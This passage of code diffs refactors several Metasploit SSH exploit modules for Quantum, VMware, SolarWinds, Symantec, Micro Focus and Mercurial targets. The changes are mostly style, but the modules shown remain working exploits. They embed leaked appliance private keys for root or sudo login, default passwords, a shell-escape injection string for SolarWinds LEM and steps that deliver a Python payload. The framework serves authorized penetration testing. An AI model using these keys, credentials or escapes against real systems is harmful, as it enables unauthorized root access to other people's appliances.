+      key_data: [ ssh_priv_key ],
+      port: rport
     })
 
-    ssh_options.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+    ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 
     print_status("#{rhost}:#{rport} - Attempting to login...")
 
@@ -102,12 +106,12 @@ class MetasploitModule < Msf::Exploit::Remote
       print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
       return
     end
-
+    # rubocop:disable Lint/ShadowingOuterLocalVariable
     if ssh
-      print_good("SSH connection is established.")
+      print_good('SSH connection is established.')
       ssh.open_channel do |ch|
-        ch.exec "hg -R --debugger serve --stdio" do |ch, success|
-          ch.on_extended_data do |ch, type, data|
+        ch.exec 'hg -R --debugger serve --stdio' do |ch, _success|
+          ch.on_extended_data do |ch, _type, data|
             if data.match(/entering debugger/)
               print_good("Triggered Debugger (#{data})")
               ch.send_data "#{payload.encoded}\n"
@@ -117,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
           end
         end
       end
-
+      # rubocop:enable Lint/ShadowingOuterLocalVariable
       begin
         ssh.loop unless session_created?
       rescue Errno::EBADF => e

--- a/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
+++ b/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
@@ -72,17 +72,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    factory = ssh_socket_factory
-    ssh_options = {
+    
+    ssh_options = ssh_client_defaults.merge({
       :auth_methods    => ['publickey'],
-      :config          => false,
-      :use_agent       => false,
       :key_data        => [ ssh_priv_key ],
-      :port            => rport,
-      :proxy           => factory,
-      :non_interactive => true,
-      :verify_host_key => :never
-    }
+      :port            => rport
+    })
 
     ssh_options.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
 

--- a/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb
+++ b/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb
@@ -79,17 +79,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def do_login(user, pass)
-    factory = ssh_socket_factory
-    opts = {
+    opts = ssh_client_defaults.merge({
       auth_methods: ['password', 'keyboard-interactive'],
       port: rport,
-      use_agent: false,
-      config: false,
-      password: pass,
-      proxy: factory,
-      non_interactive: true,
-      verify_host_key: :never
-    }
+      password: pass
+    })
 
     opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 

--- a/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb
+++ b/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb
@@ -50,7 +50,12 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Privileged' => false,
         'DefaultTarget' => 0,
-        'DisclosureDate' => '2020-09-21'
+        'DisclosureDate' => '2020-09-21',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
       )
     )
 

--- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb
+++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb
@@ -12,35 +12,43 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::SSH
 
   def initialize(info = {})
-    super(update_info(info, {
-      'Name'        => 'Quantum DXi V1000 SSH Private Key Exposure',
-      'Description' => %q{
-        Quantum ships a public/private key pair on DXi V1000 2.2.1 appliances that
-        allows passwordless authentication to any other DXi box. Since the key is
-        easily retrievable, an attacker can use it to gain unauthorized remote
-        access as root.
-      },
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Privileged'  => true,
-      'Targets'     => [ [ "Universal", {} ] ],
-      'Payload'     =>
+    super(
+      update_info(
+        info,
         {
-          'Compat'  => {
-            'PayloadType'    => 'cmd_interact',
-            'ConnectionType' => 'find',
+          'Name' => 'Quantum DXi V1000 SSH Private Key Exposure',
+          'Description' => %q{
+            Quantum ships a public/private key pair on DXi V1000 2.2.1 appliances that
+            allows passwordless authentication to any other DXi box. Since the key is
+            easily retrievable, an attacker can use it to gain unauthorized remote
+            access as root.
           },
-        },
-      'Author'      => 'xistence <xistence[at]0x90.nl>', # Discovery, Metasploit module
-      'License'     => MSF_LICENSE,
-      'References'  =>
-        [
-          ['PACKETSTORM', '125755']
-        ],
-      'DisclosureDate' => '2014-03-17',
-      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
-      'DefaultTarget' => 0
-    }))
+          'Platform' => 'unix',
+          'Arch' => ARCH_CMD,
+          'Privileged' => true,
+          'Targets' => [ [ 'Universal', {} ] ],
+          'Payload' => {
+            'Compat' => {
+              'PayloadType' => 'cmd_interact',
+              'ConnectionType' => 'find'
+            }
+          },
+          'Author' => 'xistence <xistence[at]0x90.nl>', # Discovery, Metasploit module
+          'License' => MSF_LICENSE,
+          'References' => [
+            ['PACKETSTORM', '125755']
+          ],
+          'DisclosureDate' => '2014-03-17',
+          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+          'DefaultTarget' => 0,
+          'Notes' => {
+            'Stability' => [CRASH_SAFE],
+            'Reliability' => [REPEATABLE_SESSION],
+            'SideEffects' => []
+          }
+        }
+      )
+    )
 
     register_options(
       [
@@ -56,26 +64,25 @@ class MetasploitModule < Msf::Exploit::Remote
         OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
       ]
     )
-
   end
 
   # helper methods that normally come from Tcp
   def rhost
     datastore['RHOST']
   end
+
   def rport
     datastore['RPORT']
   end
 
   def do_login(user)
-    
     opt_hash = ssh_client_defaults.merge({
-      :auth_methods    => ['publickey'],
-      :port            => rport,
-      :key_data        => [ key_data ]
+      auth_methods: ['publickey'],
+      port: rport,
+      key_data: [ key_data ]
     })
-    
-    opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+    opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']
     begin
       ssh_socket = nil
       ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
@@ -110,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    conn = do_login("root")
+    conn = do_login('root')
     if conn
       print_good "#{rhost}:#{rport} - Successful login"
       handler(conn.lsock)
@@ -118,21 +125,19 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def key_data
-    <<EOF
------BEGIN DSA PRIVATE KEY-----
-MIIBugIBAAKBgQCEgBNwgF+IbMU8NHUXNIMfJ0ONa91ZI/TphuixnilkZqcuwur2
-hMbrqY8Yne+n3eGkuepQlBBKEZSd8xPd6qCvWnCOhBqhkBS7g2dH6jMkUl/opX/t
-Rw6P00crq2oIMafR4/SzKWVW6RQEzJtPnfV7O3i5miY7jLKMDZTn/DRXRwIVALB2
-+o4CRHpCG6IBqlD/2JW5HRQBAoGAaSzKOHYUnlpAoX7+ufViz37cUa1/x0fGDA/4
-6mt0eD7FTNoOnUNdfdZx7oLXVe7mjHjqjif0EVnmDPlGME9GYMdi6r4FUozQ33Y5
-PmUWPMd0phMRYutpihaExkjgl33AH7mp42qBfrHqZ2oi1HfkqCUoRmB6KkdkFosr
-E0apJ5cCgYBLEgYmr9XCSqjENFDVQPFELYKT7Zs9J87PjPS1AP0qF1OoRGZ5mefK
-6X/6VivPAUWmmmev/BuAs8M1HtfGeGGzMzDIiU/WZQ3bScLB1Ykrcjk7TOFD6xrn
-k/inYAp5l29hjidoAONcXoHmUAMYOKqn63Q2AsDpExVcmfj99/BlpQIUYS6Hs70u
-B3Upsx556K/iZPPnJZE=
------END DSA PRIVATE KEY-----
-EOF
-    end
+    <<~EOF
+      -----BEGIN DSA PRIVATE KEY-----
+      MIIBugIBAAKBgQCEgBNwgF+IbMU8NHUXNIMfJ0ONa91ZI/TphuixnilkZqcuwur2
+      hMbrqY8Yne+n3eGkuepQlBBKEZSd8xPd6qCvWnCOhBqhkBS7g2dH6jMkUl/opX/t
+      Rw6P00crq2oIMafR4/SzKWVW6RQEzJtPnfV7O3i5miY7jLKMDZTn/DRXRwIVALB2
+      +o4CRHpCG6IBqlD/2JW5HRQBAoGAaSzKOHYUnlpAoX7+ufViz37cUa1/x0fGDA/4
+      6mt0eD7FTNoOnUNdfdZx7oLXVe7mjHjqjif0EVnmDPlGME9GYMdi6r4FUozQ33Y5
+      PmUWPMd0phMRYutpihaExkjgl33AH7mp42qBfrHqZ2oi1HfkqCUoRmB6KkdkFosr
+      E0apJ5cCgYBLEgYmr9XCSqjENFDVQPFELYKT7Zs9J87PjPS1AP0qF1OoRGZ5mefK
+      6X/6VivPAUWmmmev/BuAs8M1HtfGeGGzMzDIiU/WZQ3bScLB1Ykrcjk7TOFD6xrn
+      k/inYAp5l29hjidoAONcXoHmUAMYOKqn63Q2AsDpExVcmfj99/BlpQIUYS6Hs70u
+      B3Upsx556K/iZPPnJZE=
+      -----END DSA PRIVATE KEY-----
+    EOF
+  end
 end
-
-

--- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb
+++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb
@@ -68,17 +68,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def do_login(user)
-    factory = ssh_socket_factory
-    opt_hash = {
+    
+    opt_hash = ssh_client_defaults.merge({
       :auth_methods    => ['publickey'],
       :port            => rport,
-      :key_data        => [ key_data ],
-      :use_agent       => false,
-      :config          => false,
-      :proxy           => factory,
-      :non_interactive => true,
-      :verify_host_key => :never
-    }
+      :key_data        => [ key_data ]
+    })
+    
     opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
     begin
       ssh_socket = nil

--- a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb
+++ b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb
@@ -11,44 +11,48 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::SSH
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "Quantum vmPRO Backdoor Command",
-      'Description'    => %q{
-        This module abuses a backdoor command in Quantum vmPRO. Any user, even one without admin
-        privileges, can get access to the restricted SSH shell. By using the hidden backdoor
-        "shell-escape" command it's possible to drop to a real root bash shell. This module
-        has been tested successfully on Quantum vmPRO 3.1.2.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Quantum vmPRO Backdoor Command',
+        'Description' => %q{
+          This module abuses a backdoor command in Quantum vmPRO. Any user, even one without admin
+          privileges, can get access to the restricted SSH shell. By using the hidden backdoor
+          "shell-escape" command it's possible to drop to a real root bash shell. This module
+          has been tested successfully on Quantum vmPRO 3.1.2.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'xistence <xistence[at]0x90.nl>'  # Original discovery and Metasploit module
         ],
-      'References'     =>
-        [
+        'References' => [
           ['PACKETSTORM', '125760']
         ],
-      'DefaultOptions'  =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'thread'
         },
-      'Payload'        =>
-        {
+        'Payload' => {
           'Compat' => {
-            'PayloadType'    => 'cmd_interact',
+            'PayloadType' => 'cmd_interact',
             'ConnectionType' => 'find'
           }
         },
-      'Platform'       => 'unix',
-      'Arch'           => ARCH_CMD,
-      'Targets'        =>
-        [
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Targets' => [
           ['Quantum vmPRO 3.1.2', {}],
         ],
-      'Privileged'     => true,
-      'DisclosureDate' => '2014-03-17',
-      'DefaultTarget'  => 0))
+        'Privileged' => true,
+        'DisclosureDate' => '2014-03-17',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -67,25 +71,22 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-
   def rhost
     datastore['RHOST']
   end
-
 
   def rport
     datastore['RPORT']
   end
 
-
   def do_login(user, pass)
     opts = ssh_client_defaults.merge({
-      :auth_methods    => ['password', 'keyboard-interactive'],
-      :port            => rport,
-      :password        => pass
+      auth_methods: ['password', 'keyboard-interactive'],
+      port: rport,
+      password: pass
     })
 
-    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 
     begin
       ssh = nil
@@ -115,7 +116,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return nil
   end
-
 
   def exploit
     user = datastore['USER']

--- a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb
+++ b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb
@@ -79,17 +79,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
 
   def do_login(user, pass)
-    factory = ssh_socket_factory
-    opts = {
+    opts = ssh_client_defaults.merge({
       :auth_methods    => ['password', 'keyboard-interactive'],
       :port            => rport,
-      :use_agent       => false,
-      :config          => true,
-      :password        => pass,
-      :proxy           => factory,
-      :non_interactive => true,
-      :verify_host_key => :never
-    }
+      :password        => pass
+    })
 
     opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
 

--- a/modules/exploits/linux/ssh/solarwinds_lem_exec.rb
+++ b/modules/exploits/linux/ssh/solarwinds_lem_exec.rb
@@ -73,17 +73,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    factory = ssh_socket_factory
-    opts = {
+    opts = ssh_client_defaults.merge({
       :auth_methods    => ['keyboard-interactive'],
       :port            => rport,
-      :use_agent       => false,
-      :config          => false,
       :password        => password,
-      :proxy           => factory,
-      :non_interactive => true,
-      :verify_host_key => :never
-    }
+    })
 
     opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
 

--- a/modules/exploits/linux/ssh/solarwinds_lem_exec.rb
+++ b/modules/exploits/linux/ssh/solarwinds_lem_exec.rb
@@ -8,37 +8,37 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::SSH
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "SolarWinds LEM Default SSH Password Remote Code Execution",
-      'Description'    => %q{
-        This module exploits the default credentials of SolarWinds LEM. A menu system is encountered when the SSH
-        service is accessed with the default username and password which is "cmc" and "password". By exploiting a
-        vulnerability that exist on the menuing script, an attacker can escape from restricted shell.
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SolarWinds LEM Default SSH Password Remote Code Execution',
+        'Description' => %q{
+          This module exploits the default credentials of SolarWinds LEM. A menu system is encountered when the SSH
+          service is accessed with the default username and password which is "cmc" and "password". By exploiting a
+          vulnerability that exist on the menuing script, an attacker can escape from restricted shell.
 
-        This module was tested against SolarWinds LEM v6.3.1.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+          This module was tested against SolarWinds LEM v6.3.1.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Mehmet Ince <mehmet@mehmetince.net>',  # discovery & msf module
         ],
-      'References'     =>
-        [
+        'References' => [
           ['CVE', '2017-7722'],
           ['URL', 'http://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/']
         ],
-      'DefaultOptions' =>
-        {
-          'Payload' => 'python/meterpreter/reverse_tcp',
+        'DefaultOptions' => {
+          'Payload' => 'python/meterpreter/reverse_tcp'
         },
-      'Platform'       => ['python'],
-      'Arch'           => ARCH_PYTHON,
-      'Targets'        => [ ['Automatic', {}] ],
-      'Privileged'     => false,
-      'DisclosureDate' => '2017-03-17',
-      'DefaultTarget'  => 0
-    ))
+        'Platform' => ['python'],
+        'Arch' => ARCH_PYTHON,
+        'Targets' => [ ['Automatic', {}] ],
+        'Privileged' => false,
+        'DisclosureDate' => '2017-03-17',
+        'DefaultTarget' => 0
+      )
+    )
 
     register_options(
       [
@@ -74,12 +74,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     opts = ssh_client_defaults.merge({
-      :auth_methods    => ['keyboard-interactive'],
-      :port            => rport,
-      :password        => password,
+      auth_methods: ['keyboard-interactive'],
+      port: rport,
+      password: password
     })
 
-    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 
     print_status("#{rhost}:#{rport} - Attempting to login...")
 
@@ -105,52 +105,51 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if ssh
       payload_executed = false
-      print_good("SSH connection is established.")
+      print_good('SSH connection is established.')
 
       ssh.open_channel do |channel|
-        print_status("Requesting pty... We need it in order to interact with menuing system.")
+        print_status('Requesting pty... We need it in order to interact with menuing system.')
 
         channel.request_pty do |ch, success|
-          raise ::RuntimeError, "Could not request pty!" unless success
-          print_good("Pty successfully obtained.")
+          raise 'Could not request pty!' unless success
 
-          print_status("Requesting a shell.")
-          ch.send_channel_request("shell") do |ch, success|
-            raise ::RuntimeError, "Could not open shell!" unless success
-            print_good("Remote shell successfully obtained.")
+          print_good('Pty successfully obtained.')
+
+          print_status('Requesting a shell.')
+          ch.send_channel_request('shell') do |_ch, success|
+            raise 'Could not open shell!' unless success
+
+            print_good('Remote shell successfully obtained.')
           end
         end
 
-        channel.on_data do |ch, data|
-          if data.include? "cmc "
-            print_good("Step 1 is done. Managed to access terminal menu.")
+        channel.on_data do |_ch, data|
+          if data.include? 'cmc '
+            print_good('Step 1 is done. Managed to access terminal menu.')
             channel.send_data("service\n")
           end
 
-          if data.include? "service "
+          if data.include? 'service '
             print_good("Step 2 is done. Managed to select 'service' sub menu.")
             channel.send_data("restrictssh\n")
           end
 
-          if data.include? "Press <enter> to configure restriction on the SSH service to the Manager Appliance"
+          if data.include? 'Press <enter> to configure restriction on the SSH service to the Manager Appliance'
             print_good("Step 3 is done. Managed to start 'restrictssh' function.")
             channel.send_data("*#`bash>&2`\n")
           end
 
-          if data.include? "Are the hosts"
-            print_good("Step 4 is done. We are going to try escape from jail shell.")
+          if data.include? 'Are the hosts'
+            print_good('Step 4 is done. We are going to try escape from jail shell.')
             channel.send_data("Y\n")
           end
 
-          if data.include? "/usr/local/contego"
-            if payload_executed == false
-              print_good("Sweet..! Escaped from jail.")
-              print_status("Delivering payload...")
-              channel.send_data("python -c \"#{payload.encoded}\"\n")
-              payload_executed = true
-            end
+          if data.include? '/usr/local/contego' && (payload_executed == false)
+            print_good('Sweet..! Escaped from jail.')
+            print_status('Delivering payload...')
+            channel.send_data("python -c \"#{payload.encoded}\"\n")
+            payload_executed = true
           end
-
         end
       end
       begin

--- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb
+++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb
@@ -11,50 +11,49 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::SSH
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability",
-      'Description'    => %q{
-        This module exploits a default misconfiguration flaw on Symantec Messaging Gateway.
-        The 'support' user has a known default password, which can be used to login to the
-        SSH service, and gain privileged access from remote.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Stefan Viehbock',  #Original discovery
-          'Ben Williams',     #Reporting the vuln + coordinated release
-          'sinn3r'            #Metasploit
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability',
+        'Description' => %q{
+          This module exploits a default misconfiguration flaw on Symantec Messaging Gateway.
+          The 'support' user has a known default password, which can be used to login to the
+          SSH service, and gain privileged access from remote.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Stefan Viehbock', # Original discovery
+          'Ben Williams',     # Reporting the vuln + coordinated release
+          'sinn3r'            # Metasploit
         ],
-      'References'     =>
-        [
-          ['CVE',   '2012-3579'],
+        'References' => [
+          ['CVE', '2012-3579'],
           ['OSVDB', '85028'],
-          ['BID',   '55143'],
-          ['URL',   'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00']
+          ['BID', '55143'],
+          ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00']
         ],
-      'DefaultOptions'  =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'thread'
         },
-      'Payload'        =>
-        {
+        'Payload' => {
           'Compat' => {
-            'PayloadType'    => 'cmd_interact',
+            'PayloadType' => 'cmd_interact',
             'ConnectionType' => 'find'
           }
         },
-      'Platform'       => 'unix',
-      'Arch'           => ARCH_CMD,
-      'Targets'        =>
-        [
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Targets' => [
           ['Symantec Messaging Gateway 9.5', {}],
         ],
-      'Privileged'     => true,
-      #Timestamp on Symantec advisory
-      #But was found on Jun 26, 2012
-      'DisclosureDate' => '2012-08-27',
-      'DefaultTarget'  => 0))
+        'Privileged' => true,
+        # Timestamp on Symantec advisory
+        # But was found on Jun 26, 2012
+        'DisclosureDate' => '2012-08-27',
+        'DefaultTarget' => 0
+      )
+    )
 
     register_options(
       [
@@ -71,25 +70,22 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-
   def rhost
     datastore['RHOST']
   end
-
 
   def rport
     datastore['RPORT']
   end
 
-
   def do_login(user, pass)
     opts = ssh_client_defaults.merge({
-      :auth_methods    => ['password', 'keyboard-interactive'],
-      :port            => rport,
-      :password        => pass
-      })
+      auth_methods: ['password', 'keyboard-interactive'],
+      port: rport,
+      password: pass
+    })
 
-    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 
     begin
       ssh = nil
@@ -119,7 +115,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return nil
   end
-
 
   def exploit
     user = 'support'

--- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb
+++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb
@@ -83,17 +83,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
 
   def do_login(user, pass)
-    factory = ssh_socket_factory
-    opts = {
+    opts = ssh_client_defaults.merge({
       :auth_methods    => ['password', 'keyboard-interactive'],
       :port            => rport,
-      :use_agent       => false,
-      :config          => false,
-      :password        => pass,
-      :proxy           => factory,
-      :non_interactive => true,
-      :verify_host_key => :never
-    }
+      :password        => pass
+      })
 
     opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
 

--- a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb
+++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb
@@ -13,33 +13,36 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Auxiliary::Report
 
   def initialize(info = {})
-    super(update_info(info, {
-      'Name'        => 'VMware VDP Known SSH Key',
-      'Description' => %q{
-        VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password.
-      },
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Privileged'  => true,
-      'Targets'     => [ [ "Universal", {} ] ],
-      'Payload'     =>
+    super(
+      update_info(
+        info,
         {
-          'Compat'  => {
-            'PayloadType'    => 'cmd_interact',
-            'ConnectionType' => 'find',
+          'Name' => 'VMware VDP Known SSH Key',
+          'Description' => %q{
+            VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password.
           },
-        },
-      'Author'      => ['phroxvs'],
-      'License'     => MSF_LICENSE,
-      'References'  =>
-        [
-          [ 'CVE', '2016-7456' ],
-          [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ],
-        ],
-      'DisclosureDate' => '2016-12-20',
-      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
-      'DefaultTarget' => 0
-    }))
+          'Platform' => 'unix',
+          'Arch' => ARCH_CMD,
+          'Privileged' => true,
+          'Targets' => [ [ 'Universal', {} ] ],
+          'Payload' => {
+            'Compat' => {
+              'PayloadType' => 'cmd_interact',
+              'ConnectionType' => 'find'
+            }
+          },
+          'Author' => ['phroxvs'],
+          'License' => MSF_LICENSE,
+          'References' => [
+            [ 'CVE', '2016-7456' ],
+            [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ],
+          ],
+          'DisclosureDate' => '2016-12-20',
+          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+          'DefaultTarget' => 0
+        }
+      )
+    )
 
     register_options(
       [
@@ -55,24 +58,24 @@ class MetasploitModule < Msf::Exploit::Remote
         OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
       ]
     )
-
   end
 
   # helper methods that normally come from Tcp
   def rhost
     datastore['RHOST']
   end
+
   def rport
     datastore['RPORT']
   end
 
-  def do_login()
+  def do_login
     opt_hash = ssh_client_defaults.merge({
-      :auth_methods    => ['publickey'],
-      :port            => rport,
-      :key_data        => [ key_data ]
+      auth_methods: ['publickey'],
+      port: rport,
+      key_data: [ key_data ]
     })
-    opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+    opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']
     begin
       ssh_socket = nil
       ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
@@ -97,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # Create a new session from the socket, then dump it.
       conn = Net::SSH::CommandStream.new(ssh_socket)
-      self.sockets.delete(ssh_socket.transport.socket)
+      sockets.delete(ssh_socket.transport.socket)
 
       return conn
     else
@@ -106,28 +109,28 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    conn = do_login()
+    conn = do_login
     if conn
-      print_good "Successful login"
-        service_data = {
+      print_good 'Successful login'
+      service_data = {
         address: rhost,
         port: rport,
         protocol: 'tcp',
         service_name: 'ssh',
-        workspace_id: myworkspace_id,
+        workspace_id: myworkspace_id
       }
       credential_data = {
         username: 'admin',
         private_type: :ssh_key,
         private_data: key_data,
         origin_type: :service,
-        module_fullname: fullname,
+        module_fullname: fullname
       }.merge(service_data)
 
       core = create_credential(credential_data)
       login_data = {
         core: core,
-        last_attempted: Time.now,
+        last_attempted: Time.now
       }.merge(service_data)
 
       create_credential_login(login_data)
@@ -136,24 +139,22 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def key_data
-    <<EOF
------BEGIN RSA PRIVATE KEY-----
-MIICWQIBAAKBgQCx/XgSpdlvoy1fABui75RYQFTRGPdkHBolTNIAeA91aPfnAr2X
-/PuZR/DiHMCYcn6/8A5Jn75YOD3OL0mumJJR1uQ4pyhY+MSptiMYxhvDLIiRRo16
-9jewWCSH/7jqWH8NhImpVxt5SjWtKhQInTdPkG1dCj8oSn87bt8fKvLcVQIBIwKB
-gFuJq3dN+suzAWQOryCYeC1i6cqfICTbQKV39vjtScdajh8IuUbZ4Hq3SK7M9VW3
-Od8NvjR+Ch691qSNWRf2saWS5MHiaYGF3xWwZokbJWJWmxlQ+Di9QAyRkjDIuMCR
-Sj/vvCa6kWzZlSZWOyNbs38XkWoKXqVYwtnyXrINpZJTAkEA2p0ZrCKQTWBKt7aT
-Rvx/8xnoYu9hSXIG1k11ql0HZdRpmveuZe64Gl6oJtgBZMXNdvAds+gvGTVCSfBO
-c2ne0wJBANBt3t84oicWJpkzXnUBPOZdheKfAK6QO7weXiRmbILTJ5drPdu8pmxR
-c1uQJgYitaSNKglJmz2WNOoaPZz/7zcCQBj8Au8Z5Jsg8pinJsZIvippXGMUCx5W
-LKrHBiIZQqyNTeXTKd/DgsEvY6yq+NhRHsvDq5+IP+Wfr83vk+/u16MCQE1qozz3
-xzMW2yL10qB8zXoivLNCX1bH26xFyzIXaiH2qE4vJZrCabM0MilSzEtr+lMP3GnZ
-gs27cr1aNCRfD7UCQHOXGagsD/ijMGNcWPBQOY3foHzxozoBLGmysAmVz3vX6uyr
-Y7oq9O5vDxwpMOAZ9JYTFuzEoWWg16L6SnNVYU4=
------END RSA PRIVATE KEY-----
-EOF
-    end
+    <<~EOF
+      -----BEGIN RSA PRIVATE KEY-----
+      MIICWQIBAAKBgQCx/XgSpdlvoy1fABui75RYQFTRGPdkHBolTNIAeA91aPfnAr2X
+      /PuZR/DiHMCYcn6/8A5Jn75YOD3OL0mumJJR1uQ4pyhY+MSptiMYxhvDLIiRRo16
+      9jewWCSH/7jqWH8NhImpVxt5SjWtKhQInTdPkG1dCj8oSn87bt8fKvLcVQIBIwKB
+      gFuJq3dN+suzAWQOryCYeC1i6cqfICTbQKV39vjtScdajh8IuUbZ4Hq3SK7M9VW3
+      Od8NvjR+Ch691qSNWRf2saWS5MHiaYGF3xWwZokbJWJWmxlQ+Di9QAyRkjDIuMCR
+      Sj/vvCa6kWzZlSZWOyNbs38XkWoKXqVYwtnyXrINpZJTAkEA2p0ZrCKQTWBKt7aT
+      Rvx/8xnoYu9hSXIG1k11ql0HZdRpmveuZe64Gl6oJtgBZMXNdvAds+gvGTVCSfBO
+      c2ne0wJBANBt3t84oicWJpkzXnUBPOZdheKfAK6QO7weXiRmbILTJ5drPdu8pmxR
+      c1uQJgYitaSNKglJmz2WNOoaPZz/7zcCQBj8Au8Z5Jsg8pinJsZIvippXGMUCx5W
+      LKrHBiIZQqyNTeXTKd/DgsEvY6yq+NhRHsvDq5+IP+Wfr83vk+/u16MCQE1qozz3
+      xzMW2yL10qB8zXoivLNCX1bH26xFyzIXaiH2qE4vJZrCabM0MilSzEtr+lMP3GnZ
+      gs27cr1aNCRfD7UCQHOXGagsD/ijMGNcWPBQOY3foHzxozoBLGmysAmVz3vX6uyr
